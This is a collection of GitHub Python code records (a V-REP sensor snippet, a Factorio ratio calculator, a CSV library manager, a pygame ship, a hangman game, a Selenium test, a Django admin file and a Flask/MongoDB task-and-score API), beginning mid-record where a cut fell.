errorCode,sensor_handle=vrep.simxGetObjectHandle(clientID,'Pioneer_p3dx_ultrasonicSensor'+str(x),vrep.simx_opmode_oneshot_wait)\n sensor_h.append(sensor_handle) #keep list of handles \n errorCode,detectionState,detectedPoint,detectedObjectHandle,detectedSurfaceNormalVector=vrep.simxReadProximitySensor(clientID,sensor_handle,vrep.simx_opmode_streaming) \n sensor_val=np.append(sensor_val,np.linalg.norm(detectedPoint)) #get list of values","repo_name":"AdityaPrasadMishra/RobotLearning","sub_path":"Multi Robot Transfer Learning Project/VRepStarterCode.py","file_name":"VRepStarterCode.py","file_ext":"py","file_size_in_byte":1747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"15192742753","text":"from draftsman.data import recipes as recipes, entities, items\n\nclass 
ratio():\n\tdef __init__(self, item=None, ips=None, assembler=None, recurse=False):\n\t\tself.item=item\n\t\tself.product=self.item\n\t\tself.goal_items_per_second=ips\n\t\tself.item='advanced-oil-processing' if self.item in ['petroleum-gas', 'heavy-oil', 'light-oil'] else self.item\n\t\tself.item=self.set_item()\n\t\tif recipes.raw[self.item] and 'category' in recipes.raw[self.item].keys() and recipes.raw[self.item]['category'] == 'smelting':\n\t\t\tdel self\n\t\t\treturn\n\t\tif items.raw[self.product] and 'subgroup' in items.raw[self.product].keys() and items.raw[self.product]['subgroup'] == 'raw-resource':\n\t\t\tdel self\n\t\t\treturn\n\t\tself.goal_items_per_second=self.set_goal_ips()\n\t\tself.made_in=self.get_made_in(self.item)\n\t\tself.assembler=assembler if assembler else self.set_assembler() if 'assembling-machine-3' in self.made_in else self.made_in[0]\n\t\tself.assembler_craft_speed=entities.raw[self.assembler]['crafting_speed']\n\t\tself.actual_production=self.get_real_production()\n\t\tself.items_per_second=self.get_ips()\n\t\tself.assemblers_needed=self.get_assemblers_needed()\n\t\tself.ingredients=self.get_ingredients(self.item)\n\t\tself.show()\n\t\tif recurse:\n\t\t\tfor x in self.ingredients:\n\t\t\t\tself.dive=ratio(x[0], self.goal_items_per_second*x[1], self.assembler, True)\n\n\tdef show(self):\n\t\tprint('-'*50)\n\t\tprint(self.item, '@', str(self.goal_items_per_second)+'/s', 'in', self.assembler)\n\t\tprint(self.items_per_second, 'items/sec from 1')\n\t\tprint(self.assemblers_needed, 'needed to satisfy')\n\t\tprint('ingredients', self.ingredients)\n\n\tdef set_item(self):\n\t\titem=self.item\n\t\twhile not item or not items.raw[self.product]:\n\t\t\titem=input('item: ')\n\t\treturn item\n\n\tdef set_goal_ips(self):\n\t\tgoal_items_per_second=self.goal_items_per_second\n\t\twhile not goal_items_per_second:\n\t\t\tgoal_items_per_second=input('item/s: ')\n\t\treturn float(goal_items_per_second)\n\n\tdef set_assembler(self):\n\t\tassembling_machines=['assembling-machine', 'assembling-machine-2', 'assembling-machine-3']\n\t\tif self.made_in in assembling_machines:\n\t\t\tassembler_lvl=self.assembler\n\t\tprint('[1]', 'assembling machine,')\n\t\tprint('[2]', 'assembling machine 2, or')\n\t\tprint('[3]', 'assembling machine 3')\n\t\tassembler_lvl=int(input('assembling machine lvl: ')) if not assembler_lvl else assembler_lvl\n\t\tif not assembler_lvl or assembler_lvl not in [1, 2, 3]:\n\t\t\tassembler_lvl=self.set_assembler()\n\t\treturn assembling_machines[assembler_lvl-1]\n\n\tdef get_ingredients(self, item):\n\t\tif recipes.raw[item]:\n\t\t\tingredients=recipes.get_recipe_ingredients_and_counts(item)\n\t\t\treturn ingredients\n\n\tdef get_made_in(self, item):\n\t\tmade_in=[k for k in recipes.for_machine.keys() if item in recipes.for_machine[k]]\n\t\treturn made_in\n\n\tdef get_real_production(self):\n\t\titem_base_craft_speed=recipes.raw[self.item]['energy_required'] if 'energy_required' in recipes.raw[self.item].keys() else 0.5\n\t\tactual_production_speed=item_base_craft_speed/self.assembler_craft_speed\n\t\treturn actual_production_speed\n\n\tdef get_ips(self):\n\t\titems_created_per_craft=recipes.raw[self.item]['result_count'] if 'result_count' in recipes.raw[self.item].keys() else 1\n\t\tif 'results' in recipes.raw[self.item].keys():\n\t\t\tfor x in iter(recipes.raw[self.item]['results']):\n\t\t\t\tprint(x)\n\t\t\t\t# items_created_per_craft=recipes.raw[self.item]['results'][x]['amount'] if self.product==recipes.raw[self.item]['results'][x]['name'] else 
1\n\t\titems_per_second=1/(self.actual_production/items_created_per_craft)\n\t\treturn items_per_second\n\n\tdef get_assemblers_needed(self):\n\t\tassemblers_needed=self.goal_items_per_second/self.items_per_second\n\t\treturn assemblers_needed\n\n\nnew=ratio('advanced-circuit', 10, 'assembling-machine-2', recurse=True)","repo_name":"hidden-relic/py","sub_path":"ratio.py","file_name":"ratio.py","file_ext":"py","file_size_in_byte":3695,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"38487707015","text":"import csv\r\n\r\nclass Book:\r\n\r\n def __init__(self, id, isbn, title, author):\r\n self.id = id\r\n self.isbn = isbn\r\n self.title = title\r\n self.author = author\r\n\r\n \r\n def add_book(self):\r\n # Vérifier que tous les champs sont remplis\r\n if not all([self.id, self.isbn, self.title, self.author]):\r\n print(\"Veuillez remplir tous les champs\")\r\n return\r\n \r\n # Vérifier que l'ISBN n'est pas déjà utilisé\r\n books = self.get_all_books()\r\n #print(books)\r\n # Ajouter le livre au catalogue\r\n with open(\"livres.csv\", \"a\", newline=\"\") as csvfile:\r\n writer = csv.DictWriter(csvfile, fieldnames=[\"ID\", \"ISBN_010a\", \"Titre_200a\", \"Complement_du_titre_200e\", \"Auteur_principal_nom_700a\", \"Auteur_principal_prenom_700b\", \"Auteur_principal_qualificatif_700c\", \"Autre_auteur_principal_nom_701a\", \"Autre_auteur_principal_prenom_702b\", \"Autre_auteur_principal_qualificatif_702b\", \"Editeur_210c\"], delimiter=\";\")\r\n #writer.writeheader()\r\n writer.writerow({\"ID\": self.id, \"ISBN_010a\": self.isbn, \"Titre_200a\": self.title, \"Complement_du_titre_200e\": \"\", \"Auteur_principal_nom_700a\": self.author, \"Auteur_principal_prenom_700b\": \"\", \"Auteur_principal_qualificatif_700c\": \"\", \"Autre_auteur_principal_nom_701a\": \"\", \"Autre_auteur_principal_prenom_702b\": \"\", \"Autre_auteur_principal_qualificatif_702b\": \"\", \"Editeur_210c\": \"\"})\r\n \r\n def remove_book(self):\r\n # Vérifier que tous les champs sont remplis\r\n #if not all([self.id, self.isbn, self.title, self.author]):\r\n # print(\"Veuillez remplir tous les champs\")\r\n # return\r\n print(\"id1 -- 1\")\r\n # Vérifier que le livre existe\r\n book = self.get_book(self.id)\r\n print(book)\r\n print(\"id1 -- 2\")\r\n if not book:\r\n print(\"Livre non trouvé\")\r\n return\r\n \r\n # Supprimer le livre du catalogue\r\n books = self.get_all_books()\r\n books = [b for b in books if b[\"ID\"] != self.id]\r\n self.write_books_to_csv(books)\r\n \r\n def get_all_books(self):\r\n # Lire le fichier CSV et retourner tous les livres sous forme de liste de dictionnaires\r\n with open(\"livres.csv\", \"r\", newline=\"\") as csvfile:\r\n reader = csv.DictReader(csvfile, fieldnames=[\"ID\", \"ISBN_010a\", \"Titre_200a\", \"Complement_du_titre_200e\", \"Auteur_principal_nom_700a\", \"Auteur_principal_prenom_700b\", \"Auteur_principal_qualificatif_700c\", \"Autre_auteur_principal_nom_701a\", \"Autre_auteur_principal_prenom_702b\", \"Autre_auteur_principal_qualificatif_702b\", \"Editeur_210c\"], delimiter=\";\")\r\n return list(reader)\r\n \r\n def get_book(self, id):\r\n # Retourner le livre correspondant à l'ID donné s'il existe, sinon retourner None\r\n books = self.get_all_books()\r\n #print(books)\r\n for book in books:\r\n if book[\"ID\"] == id:\r\n return book\r\n return None\r\n\r\n def write_books_to_csv(self, books):\r\n # Écrire la liste des livres dans le fichier CSV\r\n with open(\"livres.csv\", \"w\", newline=\"\") as 
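# --- Added worked example (illustrative numbers): assemblers_needed is
# goal_items_per_second / items_per_second, where items_per_second is
# results_per_craft / (energy_required / crafting_speed). For
# advanced-circuit (energy_required 6, one result per craft) in an
# assembling-machine-2 (crafting_speed 0.75):
#   items_per_second = 1 / (6 / 0.75) = 0.125
#   a 10 items/s goal -> 10 / 0.125 = 80 assemblers
# --- end added example ---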
csvfile:\r\n writer = csv.DictWriter(csvfile, fieldnames=[\"ID\", \"ISBN_010a\", \"Titre_200a\", \"Complement_du_titre_200e\", \"Auteur_principal_nom_700a\", \"Auteur_principal_prenom_700b\", \"Auteur_principal_qualificatif_700c\", \"Autre_auteur_principal_nom_701a\", \"Autre_auteur_principal_prenom_702b\", \"Autre_auteur_principal_qualificatif_702b\", \"Editeur_210c\"])\r\n writer.writeheader()\r\n for book in books:\r\n writer.writerow(book)\r\n","repo_name":"yasser-9/LibraryManagement","sub_path":"book.py","file_name":"book.py","file_ext":"py","file_size_in_byte":3624,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"12453556031","text":"import pygame\n\n\nclass Ship:\n \"\"\"Manger the ship\"\"\"\n\n def __init__(self, ai_game):\n \"\"\"初始化飞船并设置其具体位置\"\"\"\n self.screen = ai_game.screen\n self.screen_rect = ai_game.screen.get_rect()\n self.settings = ai_game.settings\n\n # 加载飞船图像并获取其外接矩形\n self.image = pygame.image.load('images/ship.bmp')\n self.rect = self.image.get_rect()\n\n # 在飞船的属性x中存储小数值\n self.x = float(self.rect.x)\n\n # 对于每艘新飞船,都将其放在屏幕底部的中央\n self.rect.midbottom = self.screen_rect.midbottom\n\n # 移动标志\n self.moving_right = False\n self.moving_left = False\n\n def update(self):\n \"\"\"根据移动标志调整飞船的位置\"\"\"\n if self.moving_right and self.rect.right < self.screen_rect.right:\n self.x += self.settings.ship_speed\n if self.moving_left and self.rect.left > 0:\n self.x -= self.settings.ship_speed\n\n # 根据self.x更新rect对象\n self.rect.x = self.x\n\n def blitme(self):\n \"\"\"在指定位置绘制飞船\"\"\"\n self.screen.blit(self.image, self.rect)\n\n","repo_name":"Bssn520/pythonProject","sub_path":"Projects/Alien/ship.py","file_name":"ship.py","file_ext":"py","file_size_in_byte":1213,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"77"} +{"seq_id":"43482722282","text":"from random import *\n\nwords = [\"apple\", \"banana\", \"orange\"]\nword = choice(words)\n# word = \"apple\"\nprint(\"answer : \" + word)\n# letters = \"ap\"\nletters = \"\"\n\n\nwhile True:\n succeed = True\n print()\n for w in word:\n if w in letters:\n print(w, end=\" \")\n else:\n print(\"_\", end=\" \")\n succeed = False\n # break\n print()\n\n if succeed:\n print(\"Success\")\n break\n\n letter = input(\"Input letter > \") #사용자 입력받기\n if letter not in letters:\n letters += letter\n if letter in word:\n print(\"correct\")\n else:\n print(\"wrong\")\n # if letters == word:\n # print(letters)\n # break\n \n\n","repo_name":"tvbox07/Project01","sub_path":"webscrapping/webscrapping_basic/Quiz02.py","file_name":"Quiz02.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"10343444775","text":"import sys\n\ndef find_capital():\n states = {\n \"Oregon\" : \"OR\",\n \"Alabama\" : \"AL\",\n \"New Jersey\" : \"NJ\",\n \"Colorado\" : \"CO\"\n }\n\n capital_cities = {\n \"OR\": \"Salem\",\n \"AL\": \"Montgomery\",\n \"NJ\": \"Trenton\",\n \"CO\": \"Denver\"\n }\n \n if(len(sys.argv) != 2):\n exit()\n \n av = str(sys.argv[1])\n\n try:\n list(capital_cities.keys())[list(capital_cities.values()).index(av)]\n except ValueError:\n print (\"Unknow capital city\")\n \n \n\n for cle,valeur in capital_cities.items():\n if valeur == av:\n for c,v in states.items():\n if v == cle:\n print (c)\n\nif __name__ == '__main__':\n 
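# --- Added sketch (hypothetical helper name): find_capital above recovers
# a key from its value via list(...).index(...); inverting each dict once
# reads more clearly for the same O(n) cost.
def state_for_capital(capital, states, capital_cities):
    abbrev = {city: ab for ab, city in capital_cities.items()}.get(capital)
    if abbrev is None:
        return None  # unknown capital city
    return {ab: st for st, ab in states.items()}[abbrev]
# --- end added sketch ---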
find_capital()\n","repo_name":"nidzik/PythonDjango","sub_path":"d01/ex04/state.py","file_name":"state.py","file_ext":"py","file_size_in_byte":775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"17922444506","text":"from selenium import webdriver\nimport googlePage\nimport openLendingPage\nimport unittest\n\nclass OpenLending(unittest.TestCase):\n\n TIMEOUT = 30\n\n searchText = \"Open Lending\"\n\n @classmethod\n def setUpClass(cls):\n cls.driver = webdriver.Chrome('C:\\TestAutomation\\ChromeDriver\\chromedriver.exe')\n\n def setUp(self):\n self.google = googlePage.GooglePage(self, self.driver, self.TIMEOUT)\n self.openLending = openLendingPage.OpenLendingPage(self, self.driver, self.TIMEOUT)\n\n def test_open_lending(self):\n self.google.open_google()\n self.google.search(self.searchText)\n self.google.click_open_lending_link()\n self.openLending.open_resources()\n self.openLending.open_all_load_more_sections()\n blogs = self.openLending.get_all_blog_links()\n # Verify no duplicates\n self.assertTrue(len(set(blogs)) == len(blogs))\n\n @classmethod\n def tearDownClass(cls):\n cls.driver.quit()\n\nif __name__ == \"__main__\":\n unittest.main(catchbreak=True)\n","repo_name":"daveyoumans1/OpenLending","sub_path":"OpenLending.py","file_name":"OpenLending.py","file_ext":"py","file_size_in_byte":1031,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"18257540379","text":"from django.contrib import admin\nfrom .models import Order\n\nclass OrderAdmin(admin.ModelAdmin):\n list_display = (\n 'id',\n 'name',\n 'symbol',\n 'side',\n 'gtc',\n 'exp_date',\n 'value',\n 'shares',\n 'price'\n )\n\n# Register your models here.\n\nadmin.site.register(Order, OrderAdmin)","repo_name":"klewis0555/orderbook","sub_path":"backend/OrderBook/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"71597680248","text":"from flask import Flask, request, jsonify, make_response\nfrom flask_restful import Resource, Api, reqparse\nimport json\nfrom pymongo import MongoClient\nfrom pprint import pprint\nimport urllib\nfrom bson import json_util, ObjectId\nimport operator\nimport random\nimport uuid\nimport http\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.metrics import classification_report\nfrom sklearn.metrics import accuracy_score, precision_score, recall_score, f1_score\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.preprocessing import MinMaxScaler\nimport base64\nimport csv\nimport pandas as pd\n\n\napp = Flask(__name__)\napi = Api(app)\nclient = MongoClient('localhost', 27017)\ndb = client['DMSS']\n\nparser = reqparse.RequestParser()\n\n\nmin_user = 3\n\nclass CreateTeams(Resource):\n def __init__(self):\n self.users = db.Users\n\n def get(self):\n userss = self.users.find({})\n atanan = 0\n teams = []\n members = []\n userss = list(userss)\n user_count = userss.__len__()\n team_count = int(user_count/min_user)\n while True:\n user_count = userss.__len__()\n if user_count == 0:\n break\n if user_count <= 2:\n r = 0\n else:\n r = random.randint(0,user_count-1)\n if user_count < min_user and atanan == 0 : \n if team_count <= 2:\n tr = 0\n else:\n tr = random.randint(0,team_count-1)\n 
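# --- Added sketch (hedged alternative, not the original algorithm): the
# CreateTeams loop below pops random users and backfills leftovers; a
# shuffle-and-slice partition expresses the same intent more directly.
import random

def partition(users, size):
    users = list(users)
    random.shuffle(users)
    teams = [users[i:i + size] for i in range(0, len(users), size)]
    if len(teams) > 1 and len(teams[-1]) < size:
        for leftover in teams.pop():  # spread the short tail over full teams
            random.choice(teams).append(leftover)
    return teams
# --- end added sketch ---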
teams[tr].append(userss[r])\n print(teams[tr])\n userss.pop(r)\n elif members.__len__() <= min_user:\n members.append(userss[r])\n userss.pop(r)\n atanan=atanan+1\n if members.__len__() == min_user:\n teams.append(members)\n members = []\n atanan=0\n for team in teams:\n tid = uuid.uuid4()\n tr = random.randint(0,team.__len__())\n manager = team[tr]\n while manager[\"is_manager\"]:\n tr = random.randint(0,team.__len__())\n manager = team[tr]\n team.pop(tr)\n for member in team:\n db.Users.update_one({\"_id\": member[\"_id\"]},{\"$set\": {\"team_id\":tid,\"is_manager\":False,\"manager_id\": manager[\"_id\"]}})\n db.Users.update_one({\"_id\": manager[\"_id\"]},{\"$set\": {\"team_id\":tid ,\"is_manager\":True,\"manager_id\": \"\"}})\n\napi.add_resource(CreateTeams, '/create', methods=['GET'])\n\nclass TaskList(Resource):\n def __init__(self):\n self.tasks = db.Tasks\n self.users = db.Users\n\n def get(self):\n user_id = request.args.get('user_id')\n tasks_of_user = self.tasks.find({\"user_id\": user_id, \"is_complete\":False})\n user = self.users.find_one({\"_id\": ObjectId(user_id)})\n results = list(tasks_of_user)\n for res in results:\n res[\"id\"] = str(res[\"_id\"])\n del res[\"_id\"]\n print(user)\n users = self.users.find({})\n newList = sorted(users, key=lambda k: k['score'], reverse=True)\n i = 1\n rank = 1\n first = newList[0][\"score\"]\n print(first)\n count = (first - user[\"score\"]) /10\n print(count)\n for res in newList:\n if res[\"_id\"] == user[\"_id\"]:\n print(res)\n rank = i\n else:\n i = i + 1\n del res[\"_id\"]\n tasks={\"results\":results,\"name\":user[\"name\"],\"score\":user[\"score\"], \"rank\":rank, \"count\":count, \"imageURL\": user[\"imageURL\"]}\n return (jsonify(tasks=tasks))\n \napi.add_resource(TaskList, '/taskList', methods=['GET'])\n\nclass DoneTaskList(Resource):\n def __init__(self):\n self.tasks = db.Tasks\n\n def get(self):\n user_id = request.args.get('user_id')\n tasks_of_user = self.tasks.find({\"user_id\": user_id, \"is_complete\":True})\n results = list(tasks_of_user)\n for res in results:\n res[\"id\"] = str(res[\"_id\"])\n del res[\"_id\"]\n return (jsonify(tasks=results))\n \napi.add_resource(DoneTaskList, '/doneTaskList', methods=['GET'])\n\nclass ManagerTaskList(Resource):\n def __init__(self):\n self.tasks = db.Tasks\n self.users = db.Users\n\n def get(self):\n user_id = request.args.get('user_id')\n print(user_id)\n ress = []\n users = self.users.find({\"manager_id\": ObjectId(user_id)})\n print(users)\n \n for user in users:\n print(user)\n tasks_of_user = self.tasks.find({\"user_id\": str(user[\"_id\"]), \"is_complete\":True, \"is_approved\":False})\n newTask = []\n for task in tasks_of_user:\n task.update( {'imageURL' : user[\"imageURL\"]} )\n newTask.append(task)\n results = list(newTask)\n ress = ress + results\n for res in ress:\n print(res)\n res[\"id\"] = str(res[\"_id\"])\n del res[\"_id\"]\n \n print(ress)\n return (jsonify(tasks=ress))\n \napi.add_resource(ManagerTaskList, '/managerTaskList', methods=['GET'])\n\nclass UpdateTask(Resource):\n def __init__(self):\n pass\n\n def post(self):\n try:\n data = request.get_json()\n print(data)\n db.Tasks.update_one({\"_id\": ObjectId(data['id'])},{\"$set\": {\"title\":data['title'],\"date\":data['date'],\"type\":data['type']}})\n return (jsonify(res=\"1\")) \n except Exception as e:\n print(e)\n return (jsonify(res=\"0\"))\n\n def delete(self):\n try:\n data = request.get_json()\n print(data)\n db.Tasks.delete_one({\"_id\": ObjectId(data['id'])})\n return '',http.HTTPStatus.OK\n except 
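# --- Added helper sketch (hypothetical name serialize_doc): the endpoints
# in this module repeat the str(_id) / del _id conversion before jsonify;
# a small helper removes the duplication.
def serialize_doc(doc):
    doc = dict(doc)
    doc["id"] = str(doc.pop("_id"))
    return doc
# --- end added sketch ---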
Exception as e:\n print(e)\n return '',http.HTTPStatus.NO_CONTENT\n\n \napi.add_resource(UpdateTask, '/updateTask', methods=['POST','DELETE'])\n\nclass CompleteTask(Resource):\n def __init__(self):\n pass\n\n def post(self):\n try:\n data = request.get_json()\n print(data)\n db.Tasks.update_one({\"_id\": ObjectId(data['id'])},{\"$set\": {\"is_complete\":True}})\n return '',http.HTTPStatus.OK\n except Exception as e:\n print(e)\n return '',http.HTTPStatus.NO_CONTENT\n\n \napi.add_resource(CompleteTask, '/completeTask', methods=['POST'])\n\nclass ApproveTask(Resource):\n def __init__(self):\n pass\n\n def post(self):\n try:\n data = request.get_json()\n print(data[\"id\"])\n idcik = ObjectId(data['id']['id'])\n task = db.Tasks.find_one({\"_id\":idcik})\n print(\"TASK:\", task)\n db.Tasks.update_one({\"_id\": idcik},{\"$set\": {\"is_approved\":True}})\n user = db.Users.find_one({\"_id\": ObjectId(task['user_id'])})\n print(user)\n print(task[\"user_id\"])\n db.Users.update_one({\"_id\": ObjectId(task['user_id'])},{\"$inc\":{\"score\":10}})\n return '',http.HTTPStatus.OK\n except Exception as e:\n print(\"TASK\",e)\n return '',http.HTTPStatus.NO_CONTENT\n\n \napi.add_resource(ApproveTask, '/approveTask', methods=['POST'])\n\nclass Task(Resource):\n def __init__(self):\n self.tasks = db.Tasks\n\n def get(self):\n id = request.args.get('id')\n task = self.tasks.find({\"_id\": id})\n del task[\"_id\"]\n return (jsonify(tasks=task))\n\n def post(self):\n try:\n data = request.get_json()\n task = {\n #TODO: add the more properties of task\n \"user_id\": data['user_id'],\n \"title\": data['title'],\n \"date\": data['date'],\n \"type\": data['type'],\n \"is_complete\":False,\n \"is_approved\":False\n }\n db.Tasks.insert_one(task)\n print(task)\n return '',http.HTTPStatus.OK\n except Exception as e:\n print(e)\n return '',http.HTTPStatus.NO_CONTENT\n \napi.add_resource(Task, '/task', methods=['GET','POST'])\n\nclass ScoreTable(Resource):\n def __init__(self):\n self.users = db.Users\n\n def get(self):\n users = self.users.find({})\n newList = sorted(users, key=lambda k: k['score'], reverse=True) \n names = []\n for res in newList:\n if res[\"is_manager\"]:\n continue\n else:\n dic = {\"name\": str(res[\"name\"] + \" \" + res[\"surname\"]), \"score\": res[\"score\"], \"imageURL\": res[\"imageURL\"]}\n names.append(dic)\n return (jsonify(scoreTable=names))\n \napi.add_resource(ScoreTable, '/scoreTable', methods=['GET'])\n\n\nclass Profile(Resource):\n def __init__(self):\n self.users = db.Users\n\n def get(self):\n user_id = request.args.get('user_id')\n user = self.users.find_one({\"_id\": ObjectId(user_id)})\n if not user[\"is_manager\"]:\n manager = self.users.find_one({\"_id\": ObjectId(user[\"manager_id\"])})\n manager = manager[\"name\"] + \" \" + manager[\"surname\"]\n else:\n manager = user[\"name\"] + \" \" + user[\"surname\"]\n friends = self.users.find({\"team_id\": user[\"team_id\"]})\n friends = list(friends)\n newList = sorted(friends, key=lambda k: k['score'], reverse=True) \n print(\"new\",newList)\n names= []\n\n for friend in newList:\n if friend[\"is_manager\"]:\n continue\n else:\n dic = {\"name\": str(friend[\"name\"] + \" \" + friend[\"surname\"]), \"score\": friend[\"score\"]}\n names.append(dic)\n \n print(names)\n name = user['name'] + \" \" + user[\"surname\"]\n return (jsonify(score=user['score'], friends=names, manager=manager, name=name, imageURL=user['imageURL']))\n\napi.add_resource(Profile, '/profile' , methods=['GET'])\n\nclass Register(Resource):\n def __init__(self):\n 
self.users = db.Users\n def post(self):\n try:\n data = request.get_json()\n print(data)\n user = {\n \"name\": data['name'],\n \"surname\": data['surname'],\n \"email\": data['email'],\n \"password\": data['password'],\n \"score\": 0,\n \"admin\": False,\n \"is_manager\": False,\n \"team_id\": \"\",\n \"imageURL\": data['imageURL']\n }\n db.Users.insert_one(user)\n print(user)\n return jsonify(res=\"1\")\n except Exception as e:\n print(e)\n return jsonify(res=\"0\")\n\napi.add_resource(Register, '/register', methods=['POST'])\n\nclass User(Resource):\n def __init__(self):\n self.users = db.Users\n\n def get(self):\n user_id = request.args.get('user_id')\n user = self.users.find_one({\"_id\": user_id})\n return (jsonify(user=user))\n\n def post(self):\n data = request.get_json()\n user = self.users.find_one({\"email\": data[\"email\"], \"password\": data[\"password\"]})\n if user is not None:\n user[\"id\"] = str(user[\"_id\"])\n #return make_response(jsonify(isManager=user[\"is_manager\"],userID=[\"_id\"]),200)\n return jsonify(res=\"1\",isManager=user[\"is_manager\"],userID=user[\"id\"])\n \n else:\n print(user)\n #return make_response('',204)\n return jsonify(res=\"0\")\n \n def delete(self, user_id):\n self.users.delete_one({\"_id\": user_id})\n\n\n \napi.add_resource(User, '/user/' ,'/user', '/', methods=['GET', 'POST'])\n\nclass WebUser(Resource):\n def __init__(self):\n self.users = db.Users\n\n def post(self):\n data = request.get_json()\n user = self.users.find_one({\"email\": data[\"email\"], \"password\": data[\"password\"]})\n if user is not None:\n user[\"id\"] = str(user[\"_id\"])\n return make_response(jsonify(isManager=user[\"is_manager\"],userID=[\"_id\"]),200)\n \n else:\n print(user)\n return make_response('',204)\n\n\n \napi.add_resource(WebUser, '/webUser', methods=['POST'])\n\nclass FileUpload(Resource):\n def __init__(self):\n self.users = db.Users\n \n def post(self):\n data = request.get_json()\n print(data)\n data = data['file']\n dd = data.strip('data:text/plain;base64,')\n print(\"parsed:\",dd)\n print(\"parse done\")\n text = base64.b64decode(dd).decode('UTF-8')\n f = open(\"temp_file.csv\", \"w\")\n f.write(text)\n f.close()\n df = pd.read_csv(\"temp_file.csv\") \n records_ = df.to_dict(orient = 'records')\n db.Emp.insert_many(records_ )\n \napi.add_resource(FileUpload, '/file', methods=['POST'])\n\nclass AnalysisResults(Resource):\n def __init__(self):\n self.results = db.Results\n \n def get(self):\n results = self.results.find({})\n results = list(results)\n for res in results:\n del res[\"_id\"]\n return (jsonify(results=results))\n\n def post(self):\n data = request.get_json()\n print(data)\n \n\napi.add_resource(AnalysisResults, '/results', methods=['GET'])\n\nclass Regions(Resource):\n def __init__(self):\n self.regions = db.FileInfo\n \n def get(self):\n regions = self.regions.find({})\n regions = list(regions)\n print(regions)\n for res in regions:\n del res[\"_id\"]\n print(regions)\n return (jsonify(regions=regions))\n\n def post(self):\n try:\n data = request.get_json()\n print(data)\n file_info = {\n \"region\": data['region']\n }\n db.FileInfo.insert_one(file_info)\n print(file_info)\n return '',http.HTTPStatus.OK\n except Exception as e:\n print(e)\n return '',http.HTTPStatus.NO_CONTENT \n \n\napi.add_resource(Regions, '/regions', methods=['GET','POST'])\n\nclass Regs(Resource):\n def __init__(self):\n self.regions = db.FileInfo\n \n def get(self):\n regions = self.regions.find({})\n regions = list(regions)\n print(regions)\n regs = []\n for 
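# --- Added note + fix sketch: data.strip('data:text/plain;base64,') in
# FileUpload above removes any of those *characters* from both ends, not
# the literal prefix, so leading base64 digits such as 'a', 'd' or 't' can
# be eaten. Splitting a data-URL on its first comma is the safe form:
header, _, b64_payload = data.partition(',')
text = base64.b64decode(b64_payload).decode('utf-8')
# --- end added note ---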
res in regions:\n dic = {\"value\": res[\"region\"], \"label\": res[\"region\"]}\n regs.append(dic)\n print(regs)\n return (jsonify(regions=regs))\n\n\n \napi.add_resource(Regs, '/regs', methods=['GET'])\n\n\n\nclass Gift(Resource):\n def __init__(self):\n self.regions = db.FileInfo\n \n def get(self):\n regions = self.regions.find({})\n regions = list(regions)\n print(regions)\n regs = []\n for res in regions:\n regs.append(res[\"region\"])\n print(regs)\n return (jsonify(regions=regs))\n\n\n \napi.add_resource(Gift, '/gift', methods=['GET'])\n\nclass UpdateDataset(Resource):\n\n def post(self):\n try:\n data = request.get_json()\n print(data)\n record = {\n \"yetki\": data['yetki'],\n \"yapili\": data['yapili'],\n \"esyali\": data['esyali'],\n \"fiyat\": data['fiyat'],\n \"bolum\": data['bolum'],\n \"m2\": data['m2'],\n \"katSayisi\": data['katSayisi'],\n \"bulKat\": data['bulKat'],\n \"aidat\": data['aidat'],\n \"region\": data['region'],\n \"type\": data['type']\n }\n db.Records.insert_one(record)\n print(record)\n return '',http.HTTPStatus.OK\n except Exception as e:\n print(e)\n return '',http.HTTPStatus.NO_CONTENT \n\napi.add_resource(UpdateDataset, '/updateDataset', methods=['POST'])\n\nclass Analyze(Resource):\n def __init__(self):\n self.records = db.Emp\n\n\n def get(self):\n type = request.args.get('type')\n region = request.args.get('region')\n records = self.records.find({type: type, region: region})\n records = list(records)\n df = pd.DataFrame(records) \n df = df.rename(columns={'Fiyat': 'class'})\n X = df.drop(['class'],axis=1)\n y = df['class']\n X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=0)\n scaler = MinMaxScaler()\n X_train_scaled = scaler.fit_transform(X_train)\n X_test_scaled = scaler.transform(X_test)\n DTC = DecisionTreeClassifier(max_depth=None).fit(X_train_scaled, y_train)\n new_data = {\n \"yapili\":request.args.get('yapili'),\n \"esyali\":request.args.get('esyali'),\n \"m2\": request.args.get('m2'),\n \"katSayisi\": request.args.get('katSayisi'),\n \"bulKat\": request.args.get('bulKat'),\n \"aidat\": request.args.get('aidat'),\n \"region\": request.args.get('region'),\n \"type\": request.args.get('type')\n }\n y_predicted = DTC.predict(new_data)\n print(y_predicted)\n return jsonify(result=y_predicted)\n \n \napi.add_resource(Analyze, '/analyze', methods=['GET'])\n\nclass Ranking(Resource):\n def __init__(self):\n self.users = db.Users\n\n def get(self):\n id = request.args.get('id')\n users = self.users.find({})\n newList = sorted(users, key=lambda k: k['score'], reverse=True)\n i = 1\n rank = 1\n print(id)\n print(type(id))\n for res in newList:\n if res[\"_id\"] == id:\n print(res)\n rank = i\n else:\n i = i + 1\n del res[\"_id\"]\n return (jsonify(rank=rank))\n \napi.add_resource(Ranking, '/ranking', methods=['GET'])\n\nclass HomePage(Resource):\n def __init__(self):\n self.users = db.Users\n \n def get(self):\n id = request.args.get('id')\n user = self.users.find_one({\"_id\": ObjectId(id)})\n print(user)\n users = self.users.find({})\n newList = sorted(users, key=lambda k: k['score'], reverse=True)\n i = 1\n rank = 1\n for res in newList:\n if res[\"_id\"] == id:\n rank = i\n else:\n i = i + 1\n del res[\"_id\"]\n name = user['name'] + \" \" + 